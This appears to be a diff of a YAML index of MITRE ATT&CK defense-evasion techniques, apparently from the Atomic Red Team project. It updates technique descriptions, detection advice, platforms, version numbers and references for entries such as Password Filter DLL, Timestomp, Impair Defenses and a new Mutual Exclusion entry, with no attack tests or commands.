-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -3188,22 +3227,44 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3278,7 +3339,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3304,7 +3364,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3327,8 +3387,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3424,65 +3482,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3549,22 +3617,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3573,15 +3643,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3619,15 +3691,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3651,7 +3725,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3699,13 +3773,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3721,7 +3793,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3746,6 +3818,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3763,8 +3836,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3777,12 +3850,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3819,9 +3891,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3859,14 +3930,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3969,12 +4039,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -4058,7 +4127,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -4125,60 +4193,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4281,9 +4366,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4347,57 +4499,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
